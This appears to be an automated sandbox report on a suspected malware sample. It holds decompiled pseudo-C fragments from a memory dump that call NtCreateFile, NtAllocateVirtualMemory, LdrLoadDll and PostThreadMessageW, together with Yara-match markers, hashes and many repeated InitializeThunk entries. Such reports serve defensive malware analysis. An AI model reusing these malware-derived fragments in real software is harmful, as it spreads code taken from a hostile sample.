                                                                                    				void* _t15;
                                                                                    				struct _OBJDIR_INFORMATION _t17;
                                                                                    				struct _OBJDIR_INFORMATION _t18;
                                                                                    				void* _t30;
                                                                                    				void* _t31;
                                                                                    				void* _t32;
                                                                                    
                                                                                    				_t24 = _a8;
                                                                                    				_v8 =  &_v536;
                                                                                    				_t15 = E0041AB50( &_v12, 0x104, _a8);
                                                                                    				_t31 = _t30 + 0xc;
                                                                                    				if(_t15 != 0) {
                                                                                    					_t17 = E0041AF70(_v8, _t24, __eflags, _v8);
                                                                                    					_t32 = _t31 + 4;
                                                                                    					__eflags = _t17;
                                                                                    					if(__eflags != 0) {
                                                                                    						E0041B1F0(__eflags,  &_v12, 0);
                                                                                    						_t32 = _t32 + 8;
                                                                                    					}
                                                                                    					_t18 = E00419300(_v8);
                                                                                    					_v16 = _t18;
                                                                                    					__eflags = _t18;
                                                                                    					if(_t18 == 0) {
                                                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                    						return _v16;
                                                                                    					}
                                                                                    					return _t18;
                                                                                    				} else {
                                                                                    					return _t15;
                                                                                    				}
                                                                                    			}













                                                                                    0x00409b29
                                                                                    0x00409b3c
                                                                                    0x00409b3f
                                                                                    0x00409b44
                                                                                    0x00409b49
                                                                                    0x00409b53
                                                                                    0x00409b58
                                                                                    0x00409b5b
                                                                                    0x00409b5d
                                                                                    0x00409b65
                                                                                    0x00409b6a
                                                                                    0x00409b6a
                                                                                    0x00409b71
                                                                                    0x00409b79
                                                                                    0x00409b7c
                                                                                    0x00409b7e
                                                                                    0x00409b92
                                                                                    0x00000000
                                                                                    0x00409b94
                                                                                    0x00409b9a
                                                                                    0x00409b4e
                                                                                    0x00409b4e
                                                                                    0x00409b4e

                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 84%
                                                                                    			E004181C0(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, void* _a48) {
                                                                                    				void* _v3;
                                                                                    				intOrPtr _t15;
                                                                                    				signed char _t16;
                                                                                    				long _t21;
                                                                                    				long _t23;
                                                                                    				void* _t31;
                                                                                    				long _t33;
                                                                                    
                                                                                    				_t15 = _a4;
                                                                                    				_t23 =  *(_t15 + 0x10);
                                                                                    				_t3 = _t15 + 0xc40; // 0xc40
                                                                                    				_t16 = E00418DC0(_t31, _t15, _t3, _t23, 0, 0x28);
                                                                                    				 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ _t23;
                                                                                    				asm("adc al, 0x52");
                                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t23, _t16 ^ 0x0000008b, _t33); // executed
                                                                                    				return _t21;
                                                                                    			}










                                                                                    0x004181c3
                                                                                    0x004181c6
                                                                                    0x004181cf
                                                                                    0x004181d7
                                                                                    0x004181e1
                                                                                    0x004181e7
                                                                                    0x0041820d
                                                                                    0x00418211

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                    • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                    • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 75%
                                                                                    			E004181BA(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, void* _a48) {
                                                                                    				void* _v3;
                                                                                    				intOrPtr _t15;
                                                                                    				signed char _t16;
                                                                                    				long _t21;
                                                                                    				long _t23;
                                                                                    				void* _t31;
                                                                                    				long _t36;
                                                                                    				long _t39;
                                                                                    
                                                                                    				asm("adc esp, [edi+eax*8+0x55749e0c]");
                                                                                    				_t36 = _t39;
                                                                                    				_t15 = _a4;
                                                                                    				_t23 =  *(_t15 + 0x10);
                                                                                    				_t3 = _t15 + 0xc40; // 0xc40
                                                                                    				_t16 = E00418DC0(_t31, _t15, _t3, _t23, 0, 0x28);
                                                                                    				 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ _t23;
                                                                                    				asm("adc al, 0x52");
                                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t23, _t16 ^ 0x0000008b, _t36); // executed
                                                                                    				return _t21;
                                                                                    			}











                                                                                    0x004181ba
                                                                                    0x004181c1
                                                                                    0x004181c3
                                                                                    0x004181c6
                                                                                    0x004181cf
                                                                                    0x004181d7
                                                                                    0x004181e1
                                                                                    0x004181e7
                                                                                    0x0041820d
                                                                                    0x00418211

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                                                    • Instruction ID: fae6ffa33bf77168ea0cd424f9f4fd6a4ef7e0647b005e22d2a95e62c3cf46de
                                                                                    • Opcode Fuzzy Hash: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                                                    • Instruction Fuzzy Hash: 4E01A4B2211108ABCB48CF89DC95DEB77A9EF8C754F158248FA1997241D630E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                    				long _t14;
                                                                                    				void* _t21;
                                                                                    
                                                                                    				_t3 = _a4 + 0xc60; // 0xca0
                                                                                    				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                    				return _t14;
                                                                                    			}





                                                                                    0x004183af
                                                                                    0x004183b7
                                                                                    0x004183d9
                                                                                    0x004183dd

                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                    • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                    • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 82%
                                                                                    			E004182F0(void* __esi, intOrPtr _a4, void* _a8) {
                                                                                    				long _t8;
                                                                                    				void* _t11;
                                                                                    
                                                                                    				_t5 = _a4;
                                                                                    				_t2 = _t5 + 0x10; // 0x300
                                                                                    				_t3 = _t5 + 0xc50; // 0x409743
                                                                                    				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                    				_t8 = NtClose(_a8);
                                                                                    				asm("rcr byte [esi+0x5d], 1");
                                                                                    				return _t8;
                                                                                    			}





                                                                                    0x004182f3
                                                                                    0x004182f6
                                                                                    0x004182ff
                                                                                    0x00418307
                                                                                    0x00418315
                                                                                    0x00418316
                                                                                    0x00418319

                                                                                    APIs
                                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                    • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                    • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 075926850b245a4db6de9a752ef0af7399fa09e12b1bb925aee8624c6a621dff
                                                                                    • Instruction ID: ce0d6dce66d879e33f6c40a8e508eeb5a1711006ba0e35d2e663a55ae85a855a
                                                                                    • Opcode Fuzzy Hash: 075926850b245a4db6de9a752ef0af7399fa09e12b1bb925aee8624c6a621dff
                                                                                    • Instruction Fuzzy Hash: 0590026260100502D20171598404A16014AD7D0381F91C077E101455AECA6589A2F671
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b5647efba6d676840afa7f96a2592fcbb5a5f32453c1683b2fec89ba688679c8
                                                                                    • Instruction ID: 9eb69281b6446c6de08db11e229d61495eb594aaeebd43d1ec186b184904c664
                                                                                    • Opcode Fuzzy Hash: b5647efba6d676840afa7f96a2592fcbb5a5f32453c1683b2fec89ba688679c8
                                                                                    • Instruction Fuzzy Hash: CC90027220100413D21171598504B070149D7D0381F91C467E041455DD96968962F661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 5b949a19c827e6458daa5f7621982979fd964dba8ec9d4682b4cea93ed94a844
                                                                                    • Instruction ID: 061872587d756b2b6a952fbf2d087fccdd503f372d0caeb2b6caf3e5c4033e98
                                                                                    • Opcode Fuzzy Hash: 5b949a19c827e6458daa5f7621982979fd964dba8ec9d4682b4cea93ed94a844
                                                                                    • Instruction Fuzzy Hash: 05900262242041525645B15984049074146E7E0381791C067E1404955C85669866EB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0343115eb501028d1ce02005338e7a7fa97d06521c12dcdbd6a8b61c2883b6f9
                                                                                    • Instruction ID: 9da24e97d4b011f738d8982c3ce8b730d900356ba9609f783baa97114112606c
                                                                                    • Opcode Fuzzy Hash: 0343115eb501028d1ce02005338e7a7fa97d06521c12dcdbd6a8b61c2883b6f9
                                                                                    • Instruction Fuzzy Hash: FF9002A234100442D20071598414F060145D7E1341F51C06AE1054559D8659CC62F666
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6fab2b7e926b4072c7597eb4ef3affbf7d48e57440592511295b9aeaf8f70768
                                                                                    • Instruction ID: 90f86da2c744b51d0b1490cbf77feee4780841c83c4da16e7610f395fe283644
                                                                                    • Opcode Fuzzy Hash: 6fab2b7e926b4072c7597eb4ef3affbf7d48e57440592511295b9aeaf8f70768
                                                                                    • Instruction Fuzzy Hash: 6E9002B220100402D24071598404B460145D7D0341F51C066E5054559E86998DE5FBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 62844ecfab3a7b5d35e796f7d3647fb821f881413c35a4315c0b1177f19e02e2
                                                                                    • Instruction ID: 8518f7d971b8385b00d46df963d5d08d852c4c5abbad2dfd0f3d464990a1448c
                                                                                    • Opcode Fuzzy Hash: 62844ecfab3a7b5d35e796f7d3647fb821f881413c35a4315c0b1177f19e02e2
                                                                                    • Instruction Fuzzy Hash: 549002626010004242407169C844D064145FBE1351751C176E0988555D85998875EBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 729e474e75fab14150416d90da99b421810f190dab45dd746b5c9fca17d1611f
                                                                                    • Instruction ID: 86913b632f1dd0a44cadd4c0b8c9aaeb6cb56c89aaac841c445bbf4a6ce844fb
                                                                                    • Opcode Fuzzy Hash: 729e474e75fab14150416d90da99b421810f190dab45dd746b5c9fca17d1611f
                                                                                    • Instruction Fuzzy Hash: 0A90027220140402D20071598814B0B0145D7D0342F51C066E115455AD86658861FAB1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: da7a2fdaaae53ca40e7fdc202c5f7ee796165d655eaaa3b53b29fbe842dfb4f1
                                                                                    • Instruction ID: 85431d05685d319fed4f690c07b426bd3616a5f4e68691619912fc76efab5d9e
                                                                                    • Opcode Fuzzy Hash: da7a2fdaaae53ca40e7fdc202c5f7ee796165d655eaaa3b53b29fbe842dfb4f1
                                                                                    • Instruction Fuzzy Hash: 3990026221180042D30075698C14F070145D7D0343F51C16AE0144559CC9558871EA61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 5ad1840c76811aa117efdd754b4724a100c2af2d38dab46594ef5759b7fb1f3a
                                                                                    • Instruction ID: 56603ca9c53d385a80cf7bb611a13209602c8ba3b1bdc73bcc36e00c41e33fa9
                                                                                    • Opcode Fuzzy Hash: 5ad1840c76811aa117efdd754b4724a100c2af2d38dab46594ef5759b7fb1f3a
                                                                                    • Instruction Fuzzy Hash: 3B9002A220200003420571598414A16414AD7E0341B51C076E1004595DC56588A1F665
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 909d3b5a9e48934d2f9cd680104ece8b66dfbc1b8a3d597d612f7c160fe0170b
                                                                                    • Instruction ID: c9a959d7522151d9d0f6a705b83cb645f0f23cf5b46546335af526c168ccb99c
                                                                                    • Opcode Fuzzy Hash: 909d3b5a9e48934d2f9cd680104ece8b66dfbc1b8a3d597d612f7c160fe0170b
                                                                                    • Instruction Fuzzy Hash: A9900266211000030205B55947049070186D7D5391351C076F1005555CD6618871E661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b0856fe86f9d909fafbf37032993a2251b2e451fc86639fe0971f2d549a47ea6
                                                                                    • Instruction ID: e16c3bbb2738a46380d85e3196ee5a816bcb28d37a777420db30898e17dc07bf
                                                                                    • Opcode Fuzzy Hash: b0856fe86f9d909fafbf37032993a2251b2e451fc86639fe0971f2d549a47ea6
                                                                                    • Instruction Fuzzy Hash: 6690027220108802D2107159C404B4A0145D7D0341F55C466E441465DD86D588A1F661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b904b9b8ed6beadf4652ab7e58c1b46eff4bd18cd81736f9d23bb31898439474
                                                                                    • Instruction ID: b2f3d2a66bee0d2f2452ac2e74e391c4f59afcd1ac0cc30fb83436a946d8b7ad
                                                                                    • Opcode Fuzzy Hash: b904b9b8ed6beadf4652ab7e58c1b46eff4bd18cd81736f9d23bb31898439474
                                                                                    • Instruction Fuzzy Hash: FF90027220100802D28071598404A4A0145D7D1341F91C06AE0015659DCA558A69FBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6b6fe2e44749e9200480314ce98438b195a88cffc70be17b6551c4785d63b860
                                                                                    • Instruction ID: 025cb29e532ecc119f5fdd41d7433a0aeebaf252031769ba4c637240d42c0113
                                                                                    • Opcode Fuzzy Hash: 6b6fe2e44749e9200480314ce98438b195a88cffc70be17b6551c4785d63b860
                                                                                    • Instruction Fuzzy Hash: A590026230100003D24071599418A064145E7E1341F51D066E0404559CD9558866E762
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ae34870d37ac1b19feb61773375b2c676122b9d9d7cc4f8fcd330a860eae01c4
                                                                                    • Instruction ID: 5dfa6c933f30dd59c5b9af5b6a2e73c4648d4bf628751f84d45324630e55fc66
                                                                                    • Opcode Fuzzy Hash: ae34870d37ac1b19feb61773375b2c676122b9d9d7cc4f8fcd330a860eae01c4
                                                                                    • Instruction Fuzzy Hash: C790026A21300002D28071599408A0A0145D7D1342F91D46AE000555DCC9558879E761
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7773cfefede6284dbba26a2246fbe1e1a43980012409739214e851d7602aba7a
                                                                                    • Instruction ID: 29132c593c4d79ab0d172ace2f5a2d920761199e7903d005f506627bf1baeec3
                                                                                    • Opcode Fuzzy Hash: 7773cfefede6284dbba26a2246fbe1e1a43980012409739214e851d7602aba7a
                                                                                    • Instruction Fuzzy Hash: 2890027231114402D2107159C404B060145D7D1341F51C466E081455DD86D588A1F662
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2885fe68a636094b4e3d80c6dc69f338cf54639e6412c4a6ba0fa16259e8f640
                                                                                    • Instruction ID: fa01ffcd26241440f0f1d8948560431c01da16209a912eac58e2da253c2b16f3
                                                                                    • Opcode Fuzzy Hash: 2885fe68a636094b4e3d80c6dc69f338cf54639e6412c4a6ba0fa16259e8f640
                                                                                    • Instruction Fuzzy Hash: 3E90027220100402D20075999408A460145D7E0341F51D066E501455AEC6A588A1F671
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                    • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                    • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 82%
                                                                                    			E00407260(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                    				char _v67;
                                                                                    				char _v68;
                                                                                    				void* _t12;
                                                                                    				intOrPtr* _t13;
                                                                                    				int _t14;
                                                                                    				void* _t20;
                                                                                    				long _t23;
                                                                                    				intOrPtr* _t27;
                                                                                    				void* _t28;
                                                                                    				void* _t32;
                                                                                    
                                                                                    				_t32 = __eflags;
                                                                                    				_t20 = __edx;
                                                                                    				_v68 = 0;
                                                                                    				L00419D20( &_v67, 0, 0x3f);
                                                                                    				E0041A900(__ebx, _t20,  &_v68, 3);
                                                                                    				_t12 = E00409B20(_t32, _a4 + 0x1c,  &_v68); // executed
                                                                                    				_t13 = L00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                    				_t27 = _t13;
                                                                                    				if(_t27 != 0) {
                                                                                    					_t23 = _a8;
                                                                                    					_t14 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
                                                                                    					_t34 = _t14;
                                                                                    					if(_t14 == 0) {
                                                                                    						_t14 =  *_t27(_t23, 0x8003, _t28 + (L00409280(_t34, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                    					}
                                                                                    					return _t14;
                                                                                    				}
                                                                                    				return _t13;
                                                                                    			}













                                                                                    0x00407260
                                                                                    0x00407260
                                                                                    0x0040726f
                                                                                    0x00407273
                                                                                    0x0040727e
                                                                                    0x0040728e
                                                                                    0x0040729e
                                                                                    0x004072a3
                                                                                    0x004072aa
                                                                                    0x004072ad
                                                                                    0x004072ba
                                                                                    0x004072bc
                                                                                    0x004072be
                                                                                    0x004072db
                                                                                    0x004072db
                                                                                    0x00000000
                                                                                    0x004072dd
                                                                                    0x004072e2

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                    • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                    • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 20%
                                                                                    			E00407233(void* __eax, signed int __edx, void* __esi) {
                                                                                    				intOrPtr* _t6;
                                                                                    
                                                                                    				_t6 = __eax - 0xe1;
                                                                                    				asm("das");
                                                                                    				asm("das");
                                                                                    				asm("loop 0x62");
                                                                                    				asm("adc esp, [ebp-0x751e73a0]");
                                                                                    				 *(__esi + 0x68) =  *(__esi + 0x68) | __edx;
                                                                                    				_push(__esi);
                                                                                    				_push(0x11c6f95e);
                                                                                    				asm("adc eax, ebp");
                                                                                    				 *_t6 =  *_t6 + _t6;
                                                                                    				return E004195B0(0x24) + _t6 + 0x1000;
                                                                                    			}




                                                                                    0x00407233
                                                                                    0x00407235
                                                                                    0x00407236
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723f
                                                                                    0x00407240
                                                                                    0x00407241
                                                                                    0x00407245
                                                                                    0x00407249
                                                                                    0x0040725d

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: 7997dd6130d69d6a6cdf66612845a13fcb068ba07fa9f9ab66acc80c3af8de7a
                                                                                    • Instruction ID: c471a7a482c4acc8b97cc48f06a4835c8e75f01e11c13bfe5c3798fee8e62ae7
                                                                                    • Opcode Fuzzy Hash: 7997dd6130d69d6a6cdf66612845a13fcb068ba07fa9f9ab66acc80c3af8de7a
